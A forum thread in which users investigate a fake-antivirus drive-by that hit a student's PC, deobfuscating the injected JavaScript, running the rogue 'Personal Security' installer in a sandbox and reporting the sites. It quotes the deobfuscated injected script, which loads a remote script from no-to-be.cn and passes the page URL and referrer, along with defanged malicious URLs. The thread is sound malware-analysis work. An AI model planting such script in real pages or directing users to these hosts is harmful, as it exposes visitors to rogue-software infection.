Virus cleanup - URGENT

[computerfreaker]

Hi!

Unfortunately, my sister doesn't use NoScript; she was doing research for a history report and got bit - hard - by a fake AV.
The link is here for those who wish to visit: hxxp://haushaltsrecycling.de/com.at/index_de.php?q=cleopatra+history
I'm not sure that's the correct link, as I was too busy dealing with "Save file" and popup dialogs to get the site's URL - all I remembered was a .de extension - but I reproduced her search on my NoScript-protected Fx and came across this link. The proofs are strong, though: what would a recycling company be doing with Cleopatra info? And the real telltale: what about that prettily obfuscated JS? That obbed JS is triggering red flags, warning bells, etc. all over the place...

Anyway, I'm running ClamWin Portable on her computer right now; unfortunately (or perhaps fortunately?) she's only got a limited account so I can't install any resident AV software.
I've already cleared her Fx cache, cookies, etc. to insure no trace of the malware is left in her Fx; I've already scanned RAM with ClamWin (all clean), and I'll be rebooting and re-scanning her machine in the morning.

Anything else I should do? Keep in mind any kind of resident AV won't work - I've already tried Avast, which bottomed out with a "Not enough privileges" error.

Thanks in advance!

computerfreaker

P. S. Two side notes. #1, I've sworn to make her use NS after the semester's over and she has time to learn how to use it; she's finally agreed, although not happily, after the lengthy delay caused by this trash. #2, please don't de-obfuscate the JS - I want first crack at it. Vengeance will be awfully sweet...

[therube]

(Assuming this is what she has ...)
bleepingcomputer: Remove Internet Security 2010 (Uninstall Guide)

<I have no experience with this "rkill" & really haven't read the link I posted, but I would start with Malwarebytes' Anti-Malware (running a quick scan is usually enough), use this rkill if necessary. I would skip the A/V altogether.>

Since she was running as a Limited user, you wouldn't think it would be able to install anything in any case.
(From all accounts, running as a Limited user is a good thing - security-wise. Not so much a good thing when you want things like programs to actually work - correctly.)

Just by allowing haushaltsrecycling.de gave me a pretty good idea of what the exploit is working on & if so she may not have run into IS2010? Let me know what you come up with when you hack away at that JavaScript code.

---

A couple more, it looks like. I believe the ? in the URL plays a part. These two are similar to each other but slightly different from what you posted.

hxxp://a1a2.de/202093/3314.php?q=cleopatra+history

hxxp://admin.elifin.de/20207/933.php?q=cleopatra+history+for+kids


---

This should be helpful, jsunpack was designed for security researchers and computer professionals.

[computerfreaker]

(Assuming this is what she has ...)
bleepingcomputer: Remove Internet Security 2010 (Uninstall Guide)

Thanks for the uninstall guide - I might end up making use of it.
Not sure if she even has anything, though - I talked to her about what happened, and she did exactly the right thing when she saw the big "You have a virus" alert: she froze. She didn't click anywhere in the window, she didn't react to the "Save file" prompt; she just let me handle it. Of course, I ended up killing Fx. I somewhat doubt the malware was even able to download anything, and so far ClamWin agrees.
I'm going to run that page in a Sandboxed Fx, though, and see what I can see.

<I have no experience with this "rkill" & really haven't read the link I posted, but I would start with Malwarebytes' Anti-Malware (running a quick scan is usually enough), use this rkill if necessary. I would skip the A/V altogether.>

Thanks, I'll pick up MBAM this morning. Hopefully it won't require admin rights...

Since she was running as a Limited user, you wouldn't think it would be able to install anything in any case.
(From all accounts, running as a Limited user is a good thing - security-wise. Not so much a good thing when you want things like programs to actually work - correctly.)

Agreed on both counts. For once, though, programs not working correctly was a good thing.

Just by allowing haushaltsrecycling.de gave me a pretty good idea of what the exploit is working on & if so she may not have run into IS2010? Let me know what you come up with when you hack away at that JavaScript code.

I've already gone through two de-obbing cycles, and have some fairly readable JS.
The guys who wrote this are no amateurs, from the looks of things - they used hex character codes for one obbing round and bit-shifting for another. I've already dealt with the hex codes, and I'm about to replace document.write with alert to see if I can bypass the bit-shifting... should be interesting to see what comes down the pipe.

A couple more, it looks like. I believe the ? in the URL plays a part. These two are similar to each other but slightly different from what you posted.

hxxp://a1a2.de/202093/3314.php?q=cleopatra+history

hxxp://admin.elifin.de/20207/933.php?q=cleopatra+history+for+kids

Thanks for the links. I'll hit those while I'm at the de-obbing...

This should be helpful, jsunpack was designed for security researchers and computer professionals.

Nice-looking tool! Thanks for the link, I'll try that out!

[computerfreaker]

Well, I just crashed through the obfuscation. Rhino ftw!

Unfortunately, Pastebin complains that I "tripped their spam/abuse filter", so I can't post the code there; it's short enough, though, that I can post it here. As always, the link protocol has been obfuscated; everything else is completely unchanged, just as I got it from Rhino.

Code: Select all

<script language=JavaScript src="hxxp://no-to-be.cn/pdfs/main.php?r=+escape(document.referrer)+&n=x&s=+location.href+"></script>

Pretty short but plenty potent - that Chinese domain is especially tell-tale. I'm no expert on this, but that could be a command-and-control center for malware-laden or hacked pages - it's probably serving different malware for different pages. Not nice, but probably effective.

Meanwhile, ClamWin turned up an all-clear, so I've restarted my sister's computer and am re-scanning it. If it comes up all-clear again, I'll turn MBAM loose as one final check.

[computerfreaker]

Another update.
I just tried manually visiting that Chinese link with the appropriate parameters, but for some reason that didn't work that well.
Here's what I tried:
[url]hxxp://no-to-be.cn/pdfs/main.php?r=http%3A//haushaltsrecycling.de/com.at/index_de.php%3Fq%3Dcleopatra+history+&n=x&s=+http://haushaltsrecycling.de/com.at/ind ... ra+history[/url]

Maybe a problem with the string construction, but idk.
More interesting is the home page, hxxp://no-to-be.cn - it appears to be run by a legit company. Still more interesting is that trying to directly access hxxp://no-to-be.cn/pdfs/main.php returns a "File not found" error.
On the one hand, it could be a case of a malware domain being bought & reformed by good guys; on the other hand, then how on earth did my sister end up with a big fat problem last night?

Would somebody be willing to let the malware run in a sandbox to see what happens? I've already tried, but my ContentWatch installation keeps interfering with Sandboxie - I can't even open Firefox. I also can't disable CW, as I don't have the password for it...

[computerfreaker]

Here's the unencrypted JS on all of the malware sites we've got so far. (Note to mod: I've commented out all the JS and obfuscated the link protocol to protect viewers. If I didn't do enough, please let me know for the future...)
Link: [url]hxxp://haushaltsrecycling.de/com.at/index_de.php?q=cleopatra+history[/url]
JS:

Code: Select all

//<script type="text/javascript" language="JavaScript" src="hxxp://no-to-be.cn/pdfs/main.php?s=&n=x&r=undefined"></script>

Link: [url]hxxp://a1a2.de/202093/3314.php?q=cleopatra+history[/url]
JS (nice little trick in this one, probably designed to defeat blocking of the SCRIPT tag):

Code: Select all

//<script type="text/javascript" language="JavaScript">
//document.write('<sc'+'ript');
//document.write(' type="text/javascript"');
//document.write(' language="JavaScript"');
//document.write(' src="hxxp://no-to-be.cn/pdfs/main.php');
//document.write('?s='+escape(location.href)+'');
//document.write('&n=x');
//document.write('&r='+escape(document.referrer)+'">');
//document.write('</sc'+'ript>');
//</script>

Which boils down to:

Code: Select all

//<script type="text/javascript" language="JavaScript" src="hxxp://no-to-be.cn/pdfs/main.php?s=&n=x&r=undefined"></script>

Link: [url]hxxp://admin.elifin.de/20207/933.php?q=cleopatra+history+for+kids[/url]
JS:

Code: Select all

//<script type="text/javascript" language="JavaScript">
//document.write('<sc'+'ript');
//document.write(' type="text/javascript"');
//document.write(' language="JavaScript"');
//document.write(' src="hxxp://no-to-be.cn/pdfs/main.php');
//document.write('?s='+escape(location.href)+'');
//document.write('&n=x');
//document.write('&r='+escape(document.referrer)+'">');
//document.write('</sc'+'ript>');
//</script>

Which boils down to:

Code: Select all

//<script type="text/javascript" language="JavaScript" src="hxxp://no-to-be.cn/pdfs/main.php?s=&n=x&r=undefined"></script>

Interesting to note that each attack calls the same Chinese site, with similar parameters being passed. Also interesting to note that the last two sites have the identical structure (what appears to be random info about Cleopatra, probably pulled from search engines, and a single JS file with a random name & the same contents) & the identical JS.

I've still been unable to get anything from the Chinese site, though.

[computerfreaker]

More progress - I was able to get Opera Portable to open in Sandboxie, and promptly visited all 3 malware sites. Since this is Opera, everything is unlocked - JS, Java, Flash, etc., just like my sister's computer.

hxxp://haushaltsrecycling.de/com.at/index_de.php?q=cleopatra+history redirected me to hxxp://antispywarel5.com/scn1/?id=%3DHQ30jDuMzAxLjcyLjE3OSZwaWQ9MTIzJnRpbWU9MTI2MjA0Ng0NaA%3DO
where I found a gem: more obfuscated JS. A quick de-obbing at jsunpack (love that site, btw - thanks, therube!) revealed some very interesting stuff. I've uploaded the whole mess to pastebin: [url]hxxp://pastebin.com/m14abc069[/url]
It's definitely a fraud AV, and I'm going to take this investigation even further: I'm going to download the "antivirus" setup program and run it within Sandboxie to see what it does... perhaps I can get something on it.

Interestingly enough, the other two sites stayed "normal" - no malware anything. Either Opera blocked the JS from running (doubt it), or the JS was just done in a way Opera didn't understand. Doesn't matter that much, though, since I've already got one connection to the malware site.

Wish me luck - I might need it!

[Alan Baxter]

Google Safe Browsing doesn't seem to be flagging any of the malware sites you're discussing. I've verified in a sandboxed Firefox that hxxp://haushaltsrecycling.de/com.at/index_de.php?q=cleopatra+history and the site it redirects me to are not being flagged by Google Safe Browsing. I'll go ahead and report them.

[Alan Baxter]

Google Safe Browsing doesn't seem to be flagging any of the malware sites you're discussing. I've verified in a sandboxed Firefox that hxxp://haushaltsrecycling.de/com.at/index_de.php?q=cleopatra+history and the site it redirects me to are not being flagged by Google Safe Browsing. I'll go ahead and report them.

Edit: Reported hxxp://antispywarel7.com/scn1/?id=%3D3G29jjuMy4xNzEuNDAmcGlkPTEyMyZ0aW1lPTEyNjcwNgcNOAkM
and hxxp://haushaltsrecycling.de/com.at/index_de.php?q=cleopatra+history
to Google Safe Browsing: Report a Malware Page

Edit: Reported hxxp://antispyware-l10.com/scn1/?id=%3DXm19jjuMy4xNzEuNDAmcGlkPTEyMyZ0aW1lPTEyNjcwNkANNAkN
Edit: Reported hxxp://antispyware-l12.com/scn1/?id=%3D3G59jjuMy4xNzEuNDAmcGlkPTEyMyZ0aW1lPTEyNjcwNkgNOAkN
Edit: Reported hxxp://onlineantivirusr3.com/scn1/?id=%3DX209jjuMy4xNzEuNDAmcGlkPTEyMyZ0aW1lPTEyNjcxNMYNMAkO
Edit: Report "reason" was: Attempts to force a rogue anti-malware program on the user.

[computerfreaker]

Still more progress!

The rogue AV is known as "Personal Security", and (as usual) produced a bucketload of "results", including Task Manager.
A picture is better than a thousand words, so here's a graphical look at how things went.
Note to mods: I haven't changed the link protocol, since these are just pics & "license terms", not actual malware or malware code. If you think the link protocol should be changed anyway, feel free to do so or ask me to do so. Thanks!

First was a trip to the "recycling" site I originally linked to. After the quick redirect, here's what I got:

A nice imitation of Windows Explorer, accurate right down to the drive letter on my CD drive, and all done using JavaScript. (Incidentally, those "drive labels" were just plain text - I had no trouble copying & pasting from them. Fail #1)

Next up was a "system scan". Notice the long list of infections.... (another fail here, as that "infection list" couldn't be scrolled)


Flashing warnings in the background aren't enough? Look at the wording in the message: "This computer is in danger with malware <snip> and should be healed immediately." Epic fail #3.


Now a "Windows Security Alert", once again nicely done in Windows style. Unfortunately, I'm on XP Pro which doesn't have that nice kind of theme (AFAIK, that's XP Home only). Fail #4.


I downloaded their installer (still within the sandbox, of course), and kept the screenshots going during installation. Here we go:

Here are their "terms and conditions", which actually look somewhat reasonable: http://pastebin.com/m468f953f

At this point, it might be worthwhile to note a few things about this installer. First, you can't possibly miss the window - it sets itself in the foreground, on top of every other window. Also, trying to close the installer window results in a "Do you want to cancel?" dialog; clicking Cancel proceeds with the installation anyway. No particular surprise there....

The installation continues:


Done.


Now things get interesting again. This looks exactly like the Windows Security Center, but there are 3 more fails here: the window title isn't right, the window icon isn't right, and none of the reported settings are correct.


Wow, what a great AV program this is! It can find viruses anywhere, even in the Windows Task Manager! </sarcasm>


I decided to do one final thing before nuking this: a "system scan". Interesting results, and plenty of them.


At this point, I decided to nuke the sandbox and its contents; I've got some other stuff to do tonight, and it's gotten late pretty quickly.
Definitely interesting to see how this works, though!

[computerfreaker]

Reported hxxp://antispywarel7.com/scn1/?id=%3D3G29jjuMy4xNzEuNDAmcGlkPTEyMyZ0aW1lPTEyNjcwNgcNOAkM
and hxxp://haushaltsrecycling.de/com.at/index_de.php?q=cleopatra+history
to Google Safe Browsing: Report a Malware Page

I just reported hxxp://antispywarel7.com, since I'm pretty sure that id # is a parameter being passed to a dynamically-generated page.

[Alan Baxter]

Yup. That's what I saw too, at least up until the installer had been downloaded. I then quit Firefox with the close button. All in Sandboxie, of course.

[Alan Baxter]

hxxp://a1a2.de/202093/3314.php?q=cleopatra+history

hxxp://admin.elifin.de/20207/933.php?q=cleopatra+history+for+kids

These two pages are also hacked with the obfuscated javascript which attempt to run
hxxp://no-to-be.cn/pdfs/main.php?s=http%3A//a1a2.de/202093/3314.php%3Fq%3Dcleopatra+history&n=x&r=
and hxxp://no-to-be.cn/pdfs/main.php?s=http%3A//admin.elifin.de/20207/933.php%3Fq%3Dcleopatra+history+for+kids&n=x&r=
respectively, neither of which seems to be causing a redirection to the rogue site.

no-to-be.cn looks like it may be a legit site which has been hacked too.

Where did therube dig up those two links?

[computerfreaker]

Yup. That's what I saw too, at least up until the installer had been downloaded. I then quit Firefox with the close button. All in Sandboxie, of course.

I ran the installer in Sandboxie too - don't feel like infecting my computer.
Interestingly enough, the installer seems to self-destruct after it finishes running. Perhaps an attempt at covering its tracks?

[computerfreaker]

hxxp://a1a2.de/202093/3314.php?q=cleopatra+history

hxxp://admin.elifin.de/20207/933.php?q=cleopatra+history+for+kids

These two pages are also hacked with the obfuscated javascript which attempt to run
hxxp://no-to-be.cn/pdfs/main.php?s=http%3A//a1a2.de/202093/3314.php%3Fq%3Dcleopatra+history&n=x&r=
and hxxp://no-to-be.cn/pdfs/main.php?s=http%3A//admin.elifin.de/20207/933.php%3Fq%3Dcleopatra+history+for+kids&n=x&r=
respectively, neither of which seems to be causing a redirection to the rogue site.

I've been unable to get hxxp://no-to-be.cn/pdfs/main.php to load, regardless of browser (tried Firefox, Opera, Iron, and Chrome - I will not try IE though) or passed parameters - perhaps it's been taken down?

no-to-be.cn looks like it may be a legit site which has been hacked too.

Agreed. The main site looks like a real company, the English is good, etc. etc. etc. The site and the malware have two different "personalities", if you know what I mean... sort of like the difference between an educated professor and a street thug.

Where did therube dig up those two links?

No idea where therube got those links, but they're definitely loaded.